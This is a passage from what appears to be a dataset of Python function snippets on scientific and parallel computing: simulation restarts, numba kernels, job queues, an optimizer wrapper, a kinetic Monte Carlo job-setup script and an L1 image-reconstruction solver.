del(serialized_project_parameters)\n\n # Set IS_RESTARTED flag to True, STEP to zero and TIME to 0,\n # since the model has already been initialized and eventually run.\n # The model we run is coming from\n # level 0: directly from serialization, where Initialize() method is called\n # level > 0: from ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(),\n # where the model is run and then returned as an output.\n model_part_name = current_project_parameters[\"solver_settings\"][\"model_part_name\"].GetString()\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.TIME, 0.0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.STEP, 0)\n current_model.GetModelPart(model_part_name).ProcessInfo.SetValue(KratosMultiphysics.IS_RESTARTED, True)\n\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index: always True\n simulation.is_current_index_maximum_index = True\n # mapping if in current finest level (always true) and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,computational_time", "def parallelize_initfunction(targetlist, callerfunc,concurrentevents=5, *extrafuncargs):\r\n\r\n parallelizehandle = uniqueid_getid()\r\n\r\n # set up the dict locally one line at a time to avoid a ginormous line\r\n handleinfo = {}\r\n handleinfo['abort'] = False\r\n handleinfo['callfunc'] = callerfunc\r\n handleinfo['callargs'] = extrafuncargs\r\n # make a copy of target list because \r\n handleinfo['targetlist'] = targetlist[:]\r\n handleinfo['availabletargetpositions'] = range(len(handleinfo['targetlist']))\r\n handleinfo['result'] = {'exception':[],'returned':[],'aborted':[]}\r\n handleinfo['runninglist'] = []\r\n\r\n \r\n parallelize_info_dict[parallelizehandle] = handleinfo\r\n\r\n # don't start more threads than there are targets (duh!)\r\n threads_to_start = min(concurrentevents, len(handleinfo['targetlist']))\r\n\r\n for workercount in range(threads_to_start):\r\n # we need to append the workercount here because we can't return until \r\n # this is scheduled without having race conditions\r\n parallelize_info_dict[parallelizehandle]['runninglist'].append(workercount)\r\n try:\r\n settimer(0.0, parallelize_execute_function, (parallelizehandle,workercount))\r\n except:\r\n # If I'm out of resources, stop\r\n # remove this worker (they didn't start)\r\n parallelize_info_dict[parallelizehandle]['runninglist'].remove(workercount)\r\n if not parallelize_info_dict[parallelizehandle]['runninglist']:\r\n parallelize_closefunction(parallelizehandle)\r\n raise Exception, \"No events available!\"\r\n break\r\n \r\n return parallelizehandle", "def _minmaxkernel_numba(data_1, data_2):\n\n\n result = np.zeros((data_1.shape[0], data_2.shape[0]), dtype=np.float64)\n\n for i in prange(data_1.shape[0]):\n for j in prange(data_2.shape[0]):\n result[i,j] = _minmax_two_fp(data_1[i], data_2[j])\n return result", "def ms_function(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n logger.warning(\"'mindspore.ms_function' will be deprecated and removed in a future version. \"\n \"Please use 'mindspore.jit' instead.\")\n return jit(fn=fn, input_signature=input_signature, hash_args=hash_args, jit_config=jit_config)", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. {desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def minimize(fun, \n bounds = None, \n value_limit = math.inf,\n num_retries = 1000,\n logger = None,\n workers = mp.cpu_count(),\n popsize = 31, \n max_evaluations = 50000, \n capacity = 500,\n stop_fittness = None,\n optimizer = None,\n ):\n\n if optimizer is None:\n optimizer = de_cma(max_evaluations, popsize, stop_fittness) \n store = Store(bounds, capacity = capacity, logger = logger)\n return retry(fun, store, optimizer.minimize, num_retries, value_limit, workers)", "def test_onearg_and_default(self):\n varargs = (12,)\n kwargs = {}\n method = getattr(self.foo,'f_onearg_and_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 2)\n var_dict = reassign_function_arguments(method, (12, 13), kwargs)\n self.assert_(var_dict['arg1'] == 12)\n self.assert_(var_dict['default'] == 13)\n self.assert_(len(var_dict) == 2)", "def job_in(fn):\n @wraps(fn)\n def new(job):\n # do something with the job object\n return fn(job.arg)\n return new", "def job_gen(self, time_frame):", "def generate_numba_ewm_func(\n nopython: bool,\n nogil: bool,\n parallel: bool,\n com: float,\n adjust: bool,\n ignore_na: bool,\n deltas: tuple,\n normalize: bool,\n):\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def ewm(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n ) -> np.ndarray:\n result = np.empty(len(values))\n alpha = 1.0 / (1.0 + com)\n old_wt_factor = 1.0 - alpha\n new_wt = 1.0 if adjust else alpha\n\n for i in numba.prange(len(begin)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n sub_result = np.empty(len(window))\n\n weighted = window[0]\n nobs = int(not np.isnan(weighted))\n sub_result[0] = weighted if nobs >= minimum_periods else np.nan\n old_wt = 1.0\n\n for j in range(1, len(window)):\n cur = window[j]\n is_observation = not np.isnan(cur)\n nobs += is_observation\n if not np.isnan(weighted):\n if is_observation or not ignore_na:\n if normalize:\n # note that len(deltas) = len(vals) - 1 and deltas[i]\n # is to be used in conjunction with vals[i+1]\n old_wt *= old_wt_factor ** deltas[start + j - 1]\n else:\n weighted = old_wt_factor * weighted\n if is_observation:\n if normalize:\n # avoid numerical errors on constant series\n if weighted != cur:\n weighted = old_wt * weighted + new_wt * cur\n if normalize:\n weighted = weighted / (old_wt + new_wt)\n if adjust:\n old_wt += new_wt\n else:\n old_wt = 1.0\n else:\n weighted += cur\n elif is_observation:\n weighted = cur\n\n sub_result[j] = weighted if nobs >= minimum_periods else np.nan\n\n result[start:stop] = sub_result\n\n return result\n\n return ewm", "def test_MPI_Parallel_Interface(comm):\n\n def printMPI(msg):\n for i in range(comm.Get_size()):\n comm.barrier()\n if comm.Get_rank() == i:\n print(\"Proc {}: {}\".format(i, msg))\n\n n = 10\n\n par = MPI_Objective_Interface(mp.Extended_Rosenbrock, nb_domain_grid_pts=n,\n comm=comm)\n\n printMPI(par.counts)\n\n # ref = mp.Extended_Rosenbrock\n\n np.testing.assert_array_equal(\n mp.Extended_Rosenbrock.startpoint(n)[par.subdomain_slices],\n par.startpoint())\n np.testing.assert_almost_equal(\n mp.Extended_Rosenbrock.f(mp.Extended_Rosenbrock.startpoint(n)),\n par.f(par.startpoint()),\n err_msg=\"Different Function Value at startpoint\")\n np.testing.assert_allclose(\n mp.Extended_Rosenbrock.grad(mp.Extended_Rosenbrock.startpoint(n))[\n par.subdomain_slices],\n par.grad(par.startpoint()),\n err_msg=\"Different Gradient Value at startpoint\")", "def test_parallel_kwargs():\r\n lst = range(10)\r\n for n_jobs in (1, 4):\r\n yield (nose.tools.assert_equal,\r\n [f(x, y=1) for x in lst],\r\n Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst)\r\n )", "def func(job):\n return start_process(job)", "def nop_minifier(arg):\n return arg", "def par(func):\n opt[\"par\"].add(key(func))\n return func", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def parallel(self, func, args_dict=None):\n try:\n self.parallel_safe(func, args_dict)\n except Exception:\n pass", "def sum_numba(A):\n N = A.shape\n B = np.zeros((N[0], N[2]))\n for i in range(N[0]):\n for j in range(N[2]):\n for k in range(N[1]):\n B[i, j] += A[i, k, j]\n return B", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def createjob(args):\n ncell = args.ncell\n nmg = args.nmg\n nsi = args.nsi\n nvac = args.nvac\n a0 = args.a0\n temp = args.temp\n nseeds = args.nseeds\n seeds = args.seeds\n nsteps = args.nsteps\n foldername_append = args.foldername_append\n pot = args.pot\n submit = args.submit\n submitdebug = args.submitdebug\n submittime_hours = args.submittime_hours\n test = args.test\n testfiles = args.testfiles\n nodes = args.nodes\n verbose = args.verbose\n\n\n ### check if ase runner/quippy/lammpps-data formats are known\n ase_formats = mu.ase_get_known_formats_class(verbose=True)\n ase_formats.check_if_default_formats_known(copy_and_adapt_formatspy_anyhow=False)\n\n # definex ffsocket inet/unix\n if nodes == 1:\n ffsocket = \"unix\"\n elif nodes > 1:\n ffsocket = \"inet\"\n else:\n sys.exit(\"Number of nodes has to be positive!\")\n\n\n # define ntasks, neval\n lmp_par = 2 # = OMP_NUM_THREADS\n ntasks = cores = nodes * 28\n ipi_inst = 4 # for sure best on fidis\n neval = ipi_inst*2 # was alwasy better, for ompi and impi\n\n ##### get the seed(s).\n if type(seeds) == bool:\n seeds = random.sample(range(1, 999999), nseeds)\n print('seeds',seeds)\n if test == True:\n nseeds = 1\n seeds = [1]\n print('seeds',seeds)\n nseeds = len(seeds)\n\n ##### a few checks\n scripts = mu.scripts()\n mypot = mu.mypot(pot)\n if submit is True or submitdebug is True:\n hostcheck = os.environ[\"myhost\"]\n if hostcheck == \"\":\n sys.exit('host unknown 87')\n\n\n ##### here only chck if the potential can be set up. (in.lmp)\n ##### the same command is then executed for every kmc folder\n ace = mu.ase_calculate_ene(pot=pot,\n potpath=False,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket)\n\n ##### if test\n if test == True:\n nsteps = 50\n\n file_ipi_input_runner = scripts + \"/i-pi-mc_scripts/input-runner.xml\"\n\n\n ####################################\n # get directory\n ####################################\n if verbose:\n print(\"get directory\")\n pcsi = nsi/ncell**3.*100\n pcmg = nmg/ncell**3.*100\n pcvac = nvac/ncell**3.*100\n if args.cubic == True:\n pc = \"cubic\"\n else:\n pc = \"primitive\"\n directory = str(ncell)+\"x\"+str(ncell)+\"x\"+str(ncell)+\"_\"+pc+\"_\"+pot+\"_\"+\\\n str(temp)+\"K_\"+\\\n str(nvac)+\"Vac_\"+str(nmg)+\"Mg_\"+str(nsi)+\"Si__\"+\\\n str(round(pcvac,3))+\"pctVac_\"+str(round(pcmg,3))+\"pctMg_\"+str(round(pcsi,3))+\"pctSi\"\n if foldername_append != \"\":\n directory = directory+\"_\"+foldername_append\n\n ###############################################\n # make the structure\n ###############################################\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,create_fake_vacancy = True,cubic=args.cubic)\n atomsc = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell,nsi,nmg,nvac,a0,cubic=args.cubic)\n\n # make the atomic structure\n # this was to play ... not necessary now?\n if False:\n nndist = a0/np.sqrt(2.)\n\n from ase.io import read as ase_read\n from ase.io import write as ase_write\n\n ###############################################\n # get the amount of 1NN in a relly large cell\n ###############################################\n atomsc_fakevac_i = ase_read('dataxx.extxyz3',index=\":\",format='extxyz') # works, cell ist not changed\n #atomsc_fakevac_i = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=10,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=3.,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #nn = mu.ase_get_neighborlist(atomsc_fakevac_i,atomnr=0,cutoff=8.5,skin=0.1)\n #print(\"nn\",nn,'len',len(nn))\n #sys.exit()\n\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('ipi')\n atomsc_fakevac_i = ase_read('dataxx.ipi2',index=\":\",format='ipi') # works, cell ist not changed\n print(len(atomsc_fakevac_i),type(atomsc_fakevac_i))\n for idx,i in enumerate(atomsc_fakevac_i):\n print('aa',atomsc_fakevac_i[idx].positions[0])\n #print('aa',i.positions[0])\n print('quippy')\n atomsc_fakevac_i = ase_read('dataxx.quippy.xyz2',index=\":\",format='quippy') # works, cell ist not changed\n\n\n\n filename = '../sim.xyz'\n filename = '../simulation.pos_0.xyz'\n mu.count_amount_1NN_around_vacancies(filename,cutoffa=nndist,cutoffb=a0,skin=0.1,format='ipi')\n sys.exit()\n\n def mysave_quippy_xyz(atomsc_fakevac,text=False):\n if type(text) == bool:\n sys.exit('define text')\n atomsc_fakevac.write('data.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data.xyz',format=\"extxyz\",append=True)\n atomsc_fakevac.write('data'+text+'.quippy.xyz',format='quippy',append=True)\n #atomsc_fakevac.write('data'+text+'.xyz',format=\"extxyz\",append=True)\n return\n\n # create Al with single vacancy\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n #print('from ....',(atomsc_fakevac.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac.positions)[i])\n print('NN_1_indices (orig ):',NN_1_indices)\n print('NN_2_indices (orig ):',NN_2_indices)\n #sys.exit()\n atomsc_fakevac.write('dataxx.quippy.xyz',format='quippy',append=True)\n atomsc_fakevac.write('dataxx.poscar',format='vasp',append=True)\n atomsc_fakevac.write('dataxx.ipi',format='ipi',append=True) # works, currently so implemented that it canges cell\n atomsc_fakevac.write('dataxx.xyz',format='xyz',append=True)\n atomsc_fakevac.write('dataxx.extxyz',format='extxyz',append=True)\n atomsc_fakevac.write('dataxx.lammps-data',format='lammps-data',append=True)\n atomsc_fakevac.write('dataxx.lammps-runner',format='lammps-runner',append=True)\n\n atomsc_fakevac_a = ase_read('dataxx.extxyz',format='extxyz') # works, cell ist not changed\n atomsc_fakevac_a.write('dataxx.extxyz2',format='extxyz',append=True) # works, cell is not changed\n\n atomsc_fakevac_b = ase_read('dataxx.xyz',format='xyz') # not working # but this should work\n atomsc_fakevac_b.write('dataxx.xyz2',format='xyz',append=True) # this is working\n\n atomsc_fakevac_c = ase_read('dataxx.ipi',format='ipi') # works, currently so implemented that it canges cell\n #print('ipi cell',atomsc_fakevac_c.get_cell())\n\n atomsc_fakevac_c.write('dataxx.ipi2',format='ipi',append=True) # works, just writes the cell it gests.\n atomsc_fakevac_c.write('dataxx.ipi2_poscar',format='vasp',append=True) # works, just writes the cell it gests.\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_c,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (ipi ):',NN_1_indices)\n print('NN_2_indices (ipi ):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_c.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_c.positions)[i])\n\n atomsc_fakevac_cc = ase_read('dataxx.ipi2_poscar',format='vasp') # works, currently so implemented that it canges cell\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2',format='vasp',append=True)\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2_ipi',format='ipi',append=True) # works, just writes the cell it gests.\n #print('ipi cell2 (ext):',atomsc_fakevac_cc.get_cell())\n #print()\n #print('now quippy')\n atomsc_fakevac_d = ase_read('dataxx.quippy.xyz',format='quippy')\n #print('quippy cell (ext)',atomsc_fakevac_d.get_cell())\n atomsc_fakevac_d.write('dataxx.quippy.xyz2',format='quippy',append=True)\n atomsc_fakevac_d.write('dataxx.quippy.xyz2_extxyz',format='extxyz',append=True)\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_d,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (quippy):',NN_1_indices)\n print('NN_2_indices (quippy):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_d.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_d.positions)[i])\n path = \"/home/glensk/kmc/run_michele/Si6Mg6V1.1_/simulation.pos_libatom_2struct.xyz\"\n atomsc_fakevac_e = ase_read(path,format='quippy')\n\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_e,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (kmc ):',NN_1_indices)\n print('NN_2_indices (kmc ):',NN_2_indices)\n sys.exit()\n\n NN_1_indices = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=nndist,skin=0.1)\n NN_1_2_indices_tmp = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=a0,skin=0.1)\n print('NN_1_indices :',NN_1_indices)\n NN_2_indices = np.sort(np.array(mu.diff(NN_1_2_indices_tmp,NN_1_indices)))\n print('NN_2_indices :',NN_2_indices)\n NN_1_2_indices = np.concatenate((NN_1_indices, NN_2_indices ))\n print('NN_1_2_indices:',NN_1_2_indices)\n\n\n # fill only 1NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n for ii in NN_1_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n\n # fill only 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n for ii in NN_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n\n # fill 1NN and 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n for ii in NN_1_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n\n # dif compositions in 1NN shell\n filling = [ 2,4,6,8,10]\n for fi in filling:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n for idx,ii in enumerate(NN_1_indices):\n if idx < fi: ch = \"Mg\"\n else: ch = \"Si\"\n atomsc_fakevac[ii].symbol = ch\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n\n\n sys.exit()\n\n #mu.ase_get_known_formats(show=True, add_missing_formats=False, copy_formats=False, verbose=False,show_formatspy=True)\n for i in [ 'Mg', 'Si' ]:\n for ii in [ 0,1,2,3,4,5]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=i+'_'+str(ii))\n\n\n sys.exit()\n\n\n # show the input variables\n print('--------------------------- check the input --------------------------------')\n print('JOBS (nseeds) ',nseeds,'(defined by -nseeds / or -seeds)')\n print('seeds ',seeds)\n print('nsteps ',nsteps)\n print()\n print('ncell ',ncell,\"(\",atomsc.get_number_of_atoms(),\"atoms )\")\n print('nsi ',nsi, \"(\",pcsi,\"at%)\")\n print('nmg ',nmg,\"(\",pcmg,\"at%)\")\n print('nvac ',nvac,\"(\",pcvac,\"at%)\")\n print('a0 ',a0,\"angstrom\")\n print('temp ',temp,\"K\")\n print()\n print('mypot.pot ',mypot.pot)\n print('mypot.potpath ',mypot.potpath)\n print()\n print('directory ',directory)\n print('submit ',submit)\n print('submitdebug ',submitdebug)\n print()\n print('nodes ',nodes)\n print('ffsocket ',ffsocket)\n #print('python ver ',sys.version_info[0])\n #print()\n print('--------------------------- check the input --------------------------------')\n if submit == True or submitdebug == True:\n mu.get_from_prompt_Yy_orexit(\"Are the ine input variables ok? [y]es: \")\n\n # make the directory\n if os.path.isdir(directory):\n mu.get_from_prompt_Yy_orexit(\"This main directory exists already, shall I add jobs? [y]es: \")\n mu.mkdir(directory)\n\n # create README.md\n IPI_COMMAND = os.environ[\"IPI_COMMAND\"]\n LAMMPS_COMMAND = os.environ[\"LAMMPS_COMMAND\"]\n mu.create_READMEtxt(directory,add=[\"# to start manually (1): python \"+IPI_COMMAND+\" input-runner.xml\",\"# to start manually (2):\"+LAMMPS_COMMAND+\" < in.lmp\"])\n\n for seed in seeds:\n\n # make jobdirectory\n jobdir = directory+'/seed'+str(seed)\n print('jobdir',jobdir)\n if os.path.exists(jobdir):\n sys.exit(\"jobdirectory \"+str(jobdir)+\" already exists!\")\n mu.mkdir(jobdir)\n\n # get data.lmp and data.ipi\n atomsc.write(jobdir+'/data.runnerformat.lmp',format='lammps-runner')\n atomsc_fakevac.write(jobdir+'/data.ipi',format='ipi')\n atomsc_fakevac.write(jobdir+'/data.extxyz',format='extxyz')\n #atomsc_fakevac.write(jobdir+'/data_fakevac.ipi',format='ipi')\n\n if testfiles == True:\n atomsc.write(jobdir+'/data.lmp',format='lammps-data')\n atomsc.write(jobdir+'/data.POSCAR',format='vasp')\n atomsc.write(jobdir+'/data.xyz',format='xyz')\n atomsc.write(jobdir+'/data.extxyz',format='extxyz')\n atomsc.write(jobdir+'/data.espresso-in',format='espresso-in')\n\n # create in.lmp\n ace = mu.ase_calculate_ene(pot=pot,potpath=mypot.potpath,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n address = socket.gethostname()+\"_\"+os.path.basename(jobdir)\n print('address',address)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket,address=address)\n mu.lammps_write_inputfile(folder=jobdir,filename='in.lmp',positions='data.runnerformat.lmp',ace=ace)\n\n # create input-runner.xml (should be made without copying)\n mu.create_ipi_kmc_inputfile(jobdir,filename=\"input-runner.xml\",nsteps=nsteps,stride=100,seed=seed,a0=a0,ncell=ncell,nsi=nsi,nmg=nmg,nvac=nvac,neval=neval,temp=temp,nodes=nodes,address=address,testrun=test,cubic=args.cubic)\n\n # create submit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/submit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True)\n\n # create osubmit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/osubmit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=False)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=jobdir,submitskript=\"submit-ipi-kmc.sh\")\n\n # get submit-ipi-kmc.sh_all3 (should be made without copying)\n if nseeds == 3:\n mu.create_submitskript_ipi_kmc(directory+\"/submit-ipi-kmc.sh_all3\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True,\n LOOPFOLDER=True)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n if submit == True:\n mu.submitjob(submit_to_que=True,submit_to_debug_que=False,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n\n\n print('done')\n return", "def solve_l1(y, A_fun, AT_fun, lambda_l1, reshape_img_fun, show_img_progress=False, alpha=0.2, max_iter=100, solver_tol=1e-6):\n\n\n obj_lss = np.zeros(max_iter)\n x_zs = np.zeros(max_iter)\n u_norms = np.zeros(max_iter)\n times = np.zeros(max_iter)\n\n ATy = AT_fun(y)\n x_shape = ATy.shape\n d = np.prod(x_shape)\n\n def A_cgs_fun(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x)) + alpha * x\n return vec(y)\n A_cgs = LinearOperator((d,d), matvec=A_cgs_fun, dtype='float')\n\n def compute_p_inv_A(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs, vec(b), x0=vec(z0), tol=1e-3, maxiter=100)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n\n def A_cgs_fun_init(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x))\n return vec(y)\n A_cgs_init = LinearOperator((d,d), matvec=A_cgs_fun_init, dtype='float')\n\n def compute_init(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs_init, vec(b), x0=vec(z0), tol=1e-2)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n # initialize z and u\n z = compute_init(ATy, ATy)\n u = np.zeros(x_shape)\n\n\n plot_normalozer = matplotlib.colors.Normalize(vmin=0.0, vmax=1.0, clip=True)\n\n\n start_time = timeit.default_timer()\n\n for iter in range(max_iter):\n\n # x-update\n net_input = z+u\n Wzu, wbook = wavelet_transform(net_input)\n q = soft_threshold(Wzu, lambda_l1/alpha)\n x = inverse_wavelet_transform(q, wbook, x_shape)\n x = np.reshape(x, x_shape)\n\n # z-update\n b = ATy + alpha * (x - u)\n z = compute_p_inv_A(b, z)\n\n # u-update\n u += z - x;\n\n if show_img_progress == True:\n\n fig = plt.figure('current_sol')\n plt.gcf().clear()\n fig.canvas.set_window_title('iter %d' % iter)\n plt.subplot(1,3,1)\n plt.imshow(reshape_img_fun(np.clip(x, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('x')\n plt.subplot(1,3,2)\n plt.imshow(reshape_img_fun(np.clip(z, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('z')\n plt.subplot(1,3,3)\n plt.imshow(reshape_img_fun(np.clip(net_input, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('netin')\n plt.pause(0.00001)\n\n\n obj_ls = 0.5 * np.sum(np.square(y - A_fun(x)))\n x_z = np.sqrt(np.mean(np.square(x-z)))\n u_norm = np.sqrt(np.mean(np.square(u)))\n\n print('iter = %d: obj_ls = %.3e |x-z| = %.3e u_norm = %.3e' % (iter, obj_ls, x_z, u_norm))\n\n\n 